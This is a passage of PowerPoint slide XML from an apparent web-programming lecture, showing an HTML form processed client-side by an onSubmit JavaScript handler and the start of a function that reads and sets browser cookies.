                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>();" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>post”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;p&gt; Enter your name and the size of your wealth in this form:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;p&gt;Your Name &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;(Required)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;: &lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yournamebox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                                           name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="text" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;p&gt;Size of Your Wealth: &lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sizeofwealthbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sizeofwealth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" type="text" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;p&gt;&lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>formsubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>" type="submit" /&gt; &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>This form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>supposed to send anything back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o ensure form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> be sent back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o supply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>making it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onSubmit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attribute; when user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clicks on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Submit” button of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, whatever the user entered in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will be processed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>checkEntry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (which returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to prevent form from being sent to server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>alue of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>does not matter, since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217670745"/>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How JavaScript Set/Change Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>getSetCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(name, info) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>all_cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(';')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sk-SK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    var cooky = ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   = ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;   var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
